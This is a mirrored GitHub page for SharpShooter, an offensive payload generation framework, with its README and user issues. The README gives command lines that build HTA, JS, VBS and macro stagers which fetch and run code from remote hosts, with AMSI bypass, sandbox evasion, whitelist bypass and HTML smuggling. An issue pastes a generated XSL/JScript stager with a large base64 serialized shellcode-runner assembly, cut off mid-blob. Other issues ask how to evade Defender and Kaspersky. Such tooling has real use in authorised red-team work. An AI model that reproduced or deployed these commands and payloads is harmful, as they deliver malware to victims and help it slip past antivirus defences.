mdsecactivebreach / sharpshooter Goto Github PK

Payload Generation Framework

License: BSD 3-Clause "New" or "Revised" License

C# 4.97% Python 9.03% JavaScript 16.36% Smarty 19.84% HTML 0.22% VBA 31.86% VBScript 17.71%

sharpshooter's Introduction

   _____ __                    _____ __                __           
  / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
  \__ \/ __ \/ __ `/ ___/ __ \\__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
 ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /    
/____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/     
                     /_/

Description

SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.

SharpShooter payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion, and the project includes the capability to integrate sandbox detection and environment keying to assist in evading detection.

SharpShooter includes a predefined CSharp template for executing shellcode with staged and stageless payloads, but any CSharp code can be compiled and invoked in memory using reflection, courtesy of CSharp's CodeDom provider.

Finally, SharpShooter provides the ability to bundle the payload inside an HTML file using the Demiguise HTML smuggling technique.

SharpShooter targets v2, v3 and v4 of the .NET framework which will be found on most end-user Windows workstations.

Version 1.0 of SharpShooter introduced several new concepts, including COM staging, execution of Squiblydoo and Squiblytwo, as well as XSL execution. To acomplish this new functionality, several new flags were added; --com, --awl and --awlurl.

Version 2.0 of SharpShooter added the AMSI bypass module, along with support generating VBA and Excel 4 macro enabled documents.

Further information can be found on the MDSec blog post.

Usage - Command Line Mode:

SharpShooter is highly configurable, supporting a number of different payload types, sandbox evasions, delivery methods and output types.

Running SharpShooter with the --help argument will produce the following output:

usage: SharpShooter.py [-h] [--stageless] [--dotnetver <ver>] [--com <com>]
                       [--awl <awl>] [--awlurl <awlurl>] [--payload <format>]
                       [--sandbox <types>] [--amsi <amsi>] [--delivery <type>]
                       [--rawscfile <path>] [--shellcode] [--scfile <path>]
                       [--refs <refs>] [--namespace <ns>] [--entrypoint <ep>]
                       [--web <web>] [--dns <dns>] [--output <output>]
                       [--smuggle] [--template <tpl>]

optional arguments:
  -h, --help          show this help message and exit
  --stageless         Create a stageless payload
  --dotnetver <ver>   Target .NET Version: 2 or 4
  --com <com>         COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
  --awl <awl>         Application Whitelist Bypass Technique: wmic, regsvr32
  --awlurl <awlurl>   URL to retrieve XSL/SCT payload
  --payload <format>  Payload type: hta, js, jse, vba, vbe, vbs, wsf
  --sandbox <types>   Anti-sandbox techniques:
                      [1] Key to Domain (e.g. 1=CONTOSO)
                      [2] Ensure Domain Joined
                      [3] Check for Sandbox Artifacts
                      [4] Check for Bad MACs
                      [5] Check for Debugging
  --amsi <amsi>       Use amsi bypass technique: amsienable
  --delivery <type>   Delivery method: web, dns, both
  --rawscfile <path>  Path to raw shellcode file for stageless payloads
  --shellcode         Use built in shellcode execution
  --scfile <path>     Path to shellcode file as CSharp byte array
  --refs <refs>       References required to compile custom CSharp,
                      e.g. mscorlib.dll,System.Windows.Forms.dll
  --namespace <ns>    Namespace for custom CSharp,
                      e.g. Foo.bar
  --entrypoint <ep>   Method to execute,
                      e.g. Main
  --web <web>         URI for web delivery
  --dns <dns>         Domain for DNS delivery
  --output <output>   Name of output file (e.g. maldoc)
  --smuggle           Smuggle file inside HTML
  --template <tpl>    Name of template file (e.g. mcafee)

Examples of some use cases are provided below:

Stageless JavaScript

SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

Create a stageless JavaScript payload targeting version 4 of the .NET framework. This example will create a payload named foo.js in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by keying execution to the CONTOSO domain, and checking for known sandbox/VM artifacts.

Stageless HTA

SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

Create a stageless HTA payload targeting version 2/3 of the .NET framework. This example will create a payload named foo.hta in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by checking for known virtual MAC addresses. A HTML smuggling payload will also be generated named foo.html in the output directory. This payload will use the example McAfee virus scan template.

Staged VBS

SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

This example creates a staged VBS payload that performs both Web and DNS delivery. The payload will attempt to retrieve a GZipped CSharp file that executes the shellcode supplied as a CSharp byte array in the csharpsc.txt file. The CSharp file used is the built-in SharpShooter shellcode execution template. The payload is created in the output directory named foo.payload and should be hosted on http://www.foo.bar/shellcode.payload. The same file should also be hosted on the bar.foo domain using PowerDNS to serve it. The VBS file will attempt to key execution to the CONTOSO domain and will be embedded in a HTML file using the HTML smuggling technique with the McAfee virus scanned template. The resultant payload is stored in the output directory named foo.html.

Custom CSharp inside VBS

SharpShooter.py --dotnetver 2 --payload js --sandbox 2,3,4,5 --delivery web --refs mscorlib.dll,System.Windows.Forms.dll --namespace MDSec.SharpShooter --entrypoint Main --web http://www.phish.com/implant.payload --output malicious --smuggle --template mcafee

This example demonstrates how to create a staged JS payload that performs web delivery, retrieving a payload from http://www.phish.com/implant.payload. The generated payload will attempt sandbox evasion, and attempt to compile the retrieved payload which requires mscorlib.dll and System.Windows.Forms.dll as DLL references. The Main method in the MDSec.SharpShooter namespace will be executed on successful compilation.

Creation of a Squiblytwo VBS

SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl

This example creates a VBS smuggled COM stager that uses the Outlook.CreateObject() COM method as a primitive to execute wmic.exe to execute a hosted stylesheet. The --awl parameter is not used by defaults to wmic.

Creation of a XSL HTA

SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl

This example creates a HTA smuggled file that uses the the XMLDOM COM interface to retrieve and execute a hosted stylesheet.

Creation of a VBA Macro

SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl

This example creates a VBA macro file that uses the the XMLDOM COM interface to retrieve and execute a hosted stylesheet.

Creation of an Excel 4.0 SLK Macro Enabled Document

SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee

This example creates an Excel 4.0 SLK file that executes the supplied shellcode and wraps it in HTML. The shellcode cannot contain null bytes, hint:

msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o shellcode-encoded.bin -b '\x00'

Author and Credits

Author: Dominic Chell, MDSec ActiveBreach @domchell and @mdseclabs

Credits:

@tiraniddo: James Forshaw for DotNetToJScript
@Arno0x0x: for EmbedInHTML
@buffaloverflow: Rich Warren for Demiguise
@arvanaghi and @ChrisTruncer: Brandon Arvanaghi and Chris Truncer for CheckPlease
@subTee: Documentation for Squiblydoo and Squiblytwo techniques
@StanHacked: Excel 4.0 technique and code examples

sharpshooter's People

Contributors

Stargazers

Watchers

Forkers

vysecurity minkione w00t3k hackinglz samyoyo sporiyano firefalc0n peterg75 m00zh33 jack2 jymcheong av1080p qsdj averroes aln7 k0rsec dmchell juan157 shantanu561993 0x09al pentest30 r3dfruitrollup johnhubcr tai-euler h0k5 tantantut clicknull ro9ueadmin myst404 tututu-patch cyberhack255 reconvillage1 analyticsearch ankushgoel27 expertasif 3453-315h mrtaheramine demonsec666 xcrypt999 tailoredaccessteam smgorelik orf53975 redwifiteam entropicecho samentlc d4mn4t10n therealsuser nckatiku samuelriesz eltorobiz ashr avgirl topotam diggold disk-kk hsis007 dannymas fuckup1337 bsaulsbury dcmjid tosgit 3x-m4ch1na nan3r h3llozy kyawthiha7 cryptedwolf jeperez gavz open-sec idkwim reydecopas rubyistctrldyt mindspoof johnjohnsp1 alex-dengx weeshlow mmg1 glira keystroke95 seabreg ch4p34un0ir subc0ol jack51706 sjtu2008 veteransec jayaramyalla r0cknrolla slooppe curtidwtw blasterxiao benedictmak notsurprised wgwjifeng reanimat0r rvrsh3ll projecthaidar rainism h1d3r dipsec haga5

sharpshooter's Issues

how to install

custom payload

how can i use custom payload. hta, vbs, js etc?

Detected defender win10

Detect process into memory and freeze it. Some days ago it didnt detected...

Inconsitent use of tabs and spaces in modules/excel4.py

Problem: modules/excel4.py mixes spaces and tabs.
Version: lastest master
Python version 3.9.0
OS: ParrotOS

Running python3 SharpShooter.py results in:

Traceback (most recent call last):
  File "/mnt/hgfs/debian/SharpShooter/SharpShooter.py", line 21, in <module>
    from modules import *
  File "/mnt/hgfs/debian/SharpShooter/modules/excel4.py", line 39
    if i == 0:
TabError: inconsistent use of tabs and spaces in indentation

Missing license information

Hello,

I didn't find any mention of the license. Could you indicate under which license this license SharpShooter is published ? in the Readme or in a specific LICENSE file.

Thanks

Windows Defender flagging out the dropped DLL

Hi, i tested out this framework recently but it didn't work that well for me.

In my scenario, i made use of the web delivery portion to deliver my javascript payload. When the javascript file was executed, it connects back to my attacking web server to get the shellcode (A http meterpreter payload). However that was where the problem arose. From the Windows Defender log, i could see the DLL (meterpreter stager) being dropped onto the AppData\Local\Temp folder, causing windows defender to flag it out as malicious. I'm not sure what's causing this as based on what i read from the readme, the stager should actually be loaded into memory?

Issue executing C# CobaltStrike Payload

Hi, I came across this yesterday and thought it was a really cool project so today I'm having a little play!
I have generated a C# payload from Cobalt Strike, and put it in the format "0x41, 0x42" etc, and then reference that in my command:

python SharpShooter.py --dotnetver 2 --stageless --payload hta --rawscfile ~/payload.cs --smuggle --output payload --template mcafee

I host the html and hta on the web server using "host file" in Cobalt strike. When I go and visit the page the HTA Downloads and I can execute it, but I don't get a callback.

Iv had a skim of the source code but its not immediately obvious to me why this wouldn't work. I have .NET installed on the machine im testing on also.

I suppose im asking does this definitely work with Cobalt Strike C# payloads?

Thanks again for the project and look forward to your response.
Cheers

EDIT 14:33:
I have been testing again and I put the same shellcode into the CS file and compiled and executed it worked fine. Its not an EDR product blocking either so I am still unsure. just doesnt seem to work when using the generated HTA file

Encoding issue with Python3

Using Python3 causes an UTF-8 encoding error when generating the payload while Python2 works fine.
Example:

root@kali:~/tools/SharpShooter# python3 ./SharpShooter.py --stageless --payload hta --rawscfile ./msf_shellcode.bin --dotnetver 4 --output poc

       _____ __                    _____ __                __           
      / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
      \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
     ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /    
    /____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/     
                         /_/                                            

     Dominic Chell, @domchell, MDSec ActiveBreach, v2.0
    
'utf-8' codec can't decode byte 0xda in position 0: invalid continuation byte

[!] Incorrect choice
root@kali:~/tools/SharpShooter# 
root@kali:~/tools/SharpShooter# python2 ./SharpShooter.py --stageless --payload hta --rawscfile ./msf_shellcode.bin --dotnetver 4 --output poc 

       _____ __                    _____ __                __           
      / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
      \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
     ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /    
    /____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/     
                         /_/                                            

     Dominic Chell, @domchell, MDSec ActiveBreach, v2.0
    
[*] Written delivery payload to output/poc.hta
root@kali:~/tools/SharpShooter#

jsmin help

i successfully installed JSMIN, running python SharpShooter.py not locating jsmin and it exist on system. kindly advice

clean pull of the src does not appear to work with python 3 on stock kali

appears to have some compatibility issues with python 3 and 3.6. Running through the HTA payload generation causes a python error with Strings module.

Additionally when running a fresh pull with python 2.7 it will not accept a uri for the HTA payload.

I've forked the repo and have started trying to fix the bugs myself but wanted to make MDsec aware of the issues

Thanks for an amazing tool!

.HTA file execution doesn't call back

Hi,

Currently I'm generating a RAW payload in Cobalt Strike for a windows/beacon/reverse_https listener. Output is a standard payload.bin file, which is then used as input to SharpShooter as follows:

SharpShooter.py --stageless --dotnetver 4 --payload hta --output test --rawscfile payload.bin

I've also tried the following variation:

SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile payload.bin --smuggle --template mcafee

However every time I try to run the HTA file on Windows, the payload fails to call back. Windows Defender is disabled for all of this testing, and no other AV is present. Network monitoring with Wireshark confirms too that the payload is not calling out. I have tried modifying the harness.hta template to just take the payload.bin as input, without any base64 encoding or the rc4 encipherment to check if it works, however the payload still refuses to call out or even make a network connection attempt.

Am I being obtuse or can someone confirm these findings? I have tried with both Internet Explorer and of course Microsoft (R) HTML Application Host.

Run with metasploit multi/handler

Hello,
How to set lhost and lport?I didn't find the options.

alternative to avoid Kaspersky?

.net 4 payload generation issues

Payload generation for .net 4 results in a prompt on a default Windows 10 installation to install .net 3.5.

This is via command line and interactive methods.

I believe the confusion is in the code where 1=.net 2 and 2=.net 4 and a decision is made where 2 (meaning .net 4) takes .net 2 instead.

Result is .net 2 payloads are always generated.

Easily missed if testing from a Windows 10 system that has had older .net installed.

Does not appear to work with reverse_http

Hi there,
In the blog posts its is shown that the reverse_http C# shell code is used. However after a couple hours of trying to use the tool for the first time thinking i was doing something wrong, I decided to switch to reverse_tcp and it worked the first try
Using the newest version of Kali and windows 7 SP1 .net 2-4 (Fireeye Flare packages installed)

.Net v4 compatibility issue from VBA/macro

Hi,

I'm getting a similar problem to mdsecactivebreach/CACTUSTORCH#4. Basically I am generating a payload using the following arguments:

python SharpShooter.py --stageless --dotnetver 4 --payload macro --output foo --amsi amsienable --rawscfile payload.bin --com xslremote --awlurl http://172.16.132.1:80/foo.xsl

The macro is then being run on a Win 10 host with only .net framework v4 installed (no .net v2). However, with both my own assembly and the built-in sharpshooter assembly, the code executes but I get no callbacks. After putting in some debug shell.popups, it looks like it's failing when it gets to some of the System calls. Is there some sort of issue with running the JScript from XSL on systems with on .net v4 installed? The Jscript runs fine on the same system when executed from a SCT file etc.

Code below:

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:sharp="http://sharp.shooter/mynamespace">
 
<msxsl:script language="JScript" implements-prefix="sharp">
   function shooter(nodelist) {
<![CDATA[
function setversion() {
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
}
function debug(s) {}
function base64ToStream(b) {
	var enc = new ActiveXObject("System.Text.ASCIIEncoding");
	var length = enc.GetByteCount_2(b);
	var ba = enc.GetBytes_4(b);
	var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
	ba = transform.TransformFinalBlock(ba, 0, length);
	var ms = new ActiveXObject("System.IO.MemoryStream");
	ms.Write(ba, 0, (length / 4) * 3);
	ms.Position = 0;
	return ms;
}

var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAACoAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAC2SEWgAAAAAA"+
"AAAA4AAiIAsBMAAAIAAAAAgAAAAAAACKPwAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAOD8A"+
"AE8AAAAAQAAAVAQAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAA+AAAcAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAACQHwAAACAAAAAgAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAVAQAAABA"+
"AAAABgAAACIAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAoAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAGw/AAAAAAAASAAAAAIABQDMIwAANBoAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXgMoEAAACm8R"+
"AAAKFygSAAAKLAIXKhYqbnIBAABwKBAAAApvEQAAChcoEgAACiwCFioXKhMwBABSAQAAAQAAEXMT"+
"AAAKCh8gjRoAAAElFnIDAABwoiUXclUAAHCiJRhypQAAcKIlGXLzAABwoiUackUBAHCiJRtylQEA"+
"cKIlHHLhAQBwoiUdcjkCAHCiJR5yjQIAcKIlHwly3QIAcKIlHwpyNwMAcKIlHwtyhwMAcKIlHwxy"+
"3wMAcKIlHw1yNwQAcKIlHw5ylwQAcKIlHw9y5wQAcKIlHxByPQUAcKIlHxFykwUAcKIlHxJy4wUA"+
"cKIlHxNyOQYAcKIlHxRyfQYAcKIlHxVywQYAcKIlHxZyBwcAcKIlHxdySQcAcKIlHxhymwcAcKIl"+
"Hxly6QcAcKIlHxpyOwgAcKIlHxtykwgAcKIlHxxy4wgAcKIlHx1yQQkAcKIlHx5yiwkAcKIlHx9y"+
"zwkAcKILFgwrFwcImg0JKBQAAAosBwYJbxUAAAoIF1gMCAeOaTLjBm8WAAAKLQIWKhcqAAATMAYA"+
"xwAAAAIAABFzEwAACgobjRoAAAElFnIZCgBwoiUXcicKAHCiJRhyNQoAcKIlGXJDCgBwoiUaclEK"+
"AHCiCygXAAAKDBYNK3YICZoTBAcTBRYTBitdEQURBpoTBxEEbxgAAApvGQAACm8aAAAKEQdvGgAA"+
"Cm8bAAAKLDEGEQRvGAAACm8ZAAAKcl8KAHByaQoAcCgcAAAKF40fAAABJRYfOp1vHQAACm8VAAAK"+
"EQYXWBMGEQYRBY5pMpsJF1gNCQiOaTKEBm8WAAAKLQIWKhcqLigeAAAKLAIXKhYqHgIoHwAACioA"+
"EzACAG0AAAADAAARcwYAAAYKA0UFAAAAAQAAABEAAAAgAAAALwAAAD4AAAAqBgRvAQAABi1CFygg"+
"AAAKKgZvAgAABi0zFyggAAAKKgZvAwAABiwkFyggAAAKKgZvBAAABiwVFyggAAAKKgZvBQAABiwG"+
"FyggAAAKKjJzCgAABgNvDQAABioAABswBABbAAAABAAAEQMoIQAACgp+IgAACgaOaRdYaigjAAAK"+
"IAAwAAAfQCgHAAAGCwYWBwaOaSgkAAAKB9AHAAACKCUAAAooJgAACnQHAAACbw8AAAYm3g4HFiAA"+
"gAAAKAkAAAYm3CoAARAAAAIAJAAoTAAOAAAAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAA"+
"AAUAbAAAAPAFAAAjfgAAXAYAAOwGAAAjU3RyaW5ncwAAAABIDQAAdAoAACNVUwC8FwAAEAAAACNH"+
"VUlEAAAAzBcAAGgCAAAjQmxvYgAAAAAAAAACAAABVx0CHAkCAAAA+gEzABYAAAEAAAAoAAAABwAA"+
"ABcAAAARAAAAFwAAACYAAAAUAAAAEQAAAAQAAAACAAAAAQAAAAMAAAABAAAAAgAAAAQAAAAAAEEE"+
"AQAAAAAABgARA4cFBgB+A4cFBgAtAj0FDwCnBQAABgBVApQEBgDDApQEBgCkApQEBgBlA5QEBgAx"+
"A5QEBgBKA5QEBgBsApQEBgBBAmgFBgAfAmgFBgCHApQEBgBqBloEBgABAOYACgBiAXYEBgACA1oE"+
"BgBhBFoEBgC3BGgFBgDgAmgFBgANAloEBgCTBloEBgAPBFoECgC5BXYEBgAEBFoEBgDJBFoEBgDB"+
"AX8ACgAhBnYECgDLBv8FBgDiBFoEBgDnBD0FBgCnBloEBgDDBloEBgA2BVoEBgA1BVoEBgAsBGgF"+
"BgDsAVoEBgCdAVoEBgAWAloEAAAAAB0AAAAAAAEAAQAAABAA8QEAAD0AAQABAAEAEAAaBQAAPQAB"+
"AAcAAgEAAOIBAABNAAEADgACAQAApgQAAE0ACQAOAAIBAADXAQAATQAVAA4AAgEAAP0BAABZABgA"+
"DgAGBswALgFWgKoAMQFWgFkAMQFWgJ4AMQFWgIkAMQFWgG0AMQFWgHYAMQFWgGEAMQEGBswALgFW"+
"gFEANQFWgCYANQFWgD8ANQFWgLoANQFWgJUANQFWgLEANQFWgEcANQFWgMIANQFWgK8DNQFWgMID"+
"NQFWgNcDNQEGBswALgFWgKQAOQFWgDMAOQFQIAAAAACGAGYEcQABAGggAAAAAIYARAE9AQIAhCAA"+
"AAAAhgBKBj0BAgDkIQAAAACGAN0APQECALciAAAAAIYAKgE9AQIAwyIAAAAAhhgvBQYAAgAAAAAA"+
"gACRIAEBQQECAAAAAACAAJYgGQFLAQYAAAAAAIAAkSB7AVUBDADDIgAAAACGGC8FBgAPAMwiAAAA"+
"AIYA8QFdAQ8ARSMAAAAAhgDaBBAAEQBUIwAAAACGAL0GEAASAAAAAAADAIYYLwVjARMAAAAAAAMA"+
"xgGWAU4AFQAAAAAAAwDGAZEBaQEVAAAAAAADAMYBhwFxARcAAAABAG8EAAABADEGAAACAKgDAAAD"+
"AOABAAAEAHgGAAABAMwFAAACAJwDAAADADsGAAAEAPAEAAAFAN8FAAAGAA4BAAABADEGAAACAKgD"+
"AAADANUBAAABACYEAAACAAsEAAABABEAAAABABEAAAABAHEGAAACAFsBAAABAB0EAAACAHEGAAAB"+
"AKAGCQAvBQEAEQAvBQYAGQAvBQoAKQAvBRAAMQAvBRAAOQAvBRAAQQAvBRAASQAvBRAAUQAvBRAA"+
"WQAvBRAAYQAvBRUAaQAvBRAAcQAvBRAAkQAvBQYAqQAvBRoAyQC2BSAAyQDGASUA0QDvBSkADAAv"+
"BQYA4QBjBkMADAAmAUgADACzBk4AiQBQBWYAiQAeBmwAeQACBCUA0QAnBSUA0QD2BXEA8QBzAXYA"+
"0QBTAX0AAQE1AYMAeQAvBQYACQGOBowAEQHxA5cAGQHdBJ0AIQGCBqAAKQHmBqUAMQGvAa4AKQH8"+
"BLcACQAIAMoACQAMAM8ACQAQANQACQAUANkACQAYAN4ACQAcAOMACQAgAOgACQAoAO0ACQAsAPIA"+
"CQAwAPcACQA0APwACQA4AAEBCQA8AAYBCQBAAAsBCQBEABABCQBIABUBCQBMABoBCQBQAB8BCQBY"+
"ACQBCQBcACkBLgALAHcBLgATAIABLgAbAJ8BLgAjAKgBLgArAMIBLgAzAOUBLgA7AOsBLgBDAKgB"+
"LgBLAAMCLgBTAOUBLgBbAOUBLgBjACsCLgBrAFUCYwBbAGICgwBzAAEBowBzAAEB4wB7AJ8BMQBS"+
"AIcAkQA0BAgAPQBAAQ8AAQEBAAABEQAZAQEAAAETAHsBAgAEgAAAAQAAAAAAAAAAAAAAAADRBgAA"+
"AgAAAAAAAAAAAAAAwQDUAAAAAAACAAAAAAAAAAAAAADBAFoEAAAAAAQAAwAFAAMABgADAAcAAwAA"+
"AAAAAExpc3RgMQBrZXJuZWwzMgBzaGVsbGNvZGU2NAA8TW9kdWxlPgBFWEVDVVRFX1JFQUQATUVN"+
"X1JFTEVBU0UARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAFdSSVRFX1dBVENIAFBI"+
"WVNJQ0FMAFRPUF9ET1dOAFN5c3RlbS5JTwBMQVJHRV9QQUdFUwBOT0FDQ0VTUwBSRVNFVABNRU1f"+
"REVDT01NSVQAUkVBRE9OTFkARVhFQ1VURV9XUklURUNPUFkAdmFsdWVfXwBtc2NvcmxpYgBpc0Jh"+
"ZE1hYwBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBWaXJ0dWFsQWxsb2MAbHBUaHJlYWRJZABD"+
"cmVhdGVUaHJlYWQAQWRkAGlzRGVidWdnZWQAZ2V0X0lzQXR0YWNoZWQAaXNEb21haW5Kb2luZWQA"+
"VHJpbUVuZABtZXRob2QATmV0d29ya0ludGVyZmFjZQBSZXBsYWNlAFZpcnR1YWxGcmVlAEVuZElu"+
"dm9rZQBCZWdpbkludm9rZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBGaWxl"+
"AGdldF9Eb21haW5OYW1lAGR3RnJlZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBDaGVja1BsZWFzZQBF"+
"eGVjdXRlRGVsZWdhdGUATXVsdGljYXN0RGVsZWdhdGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxl"+
"QXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3Nl"+
"bWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2Vt"+
"Ymx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAFVu"+
"bWFuYWdlZEZ1bmN0aW9uUG9pbnRlckF0dHJpYnV0ZQBGbGFnc0F0dHJpYnV0ZQBDb21waWxhdGlv"+
"blJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNv"+
"cHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGli"+
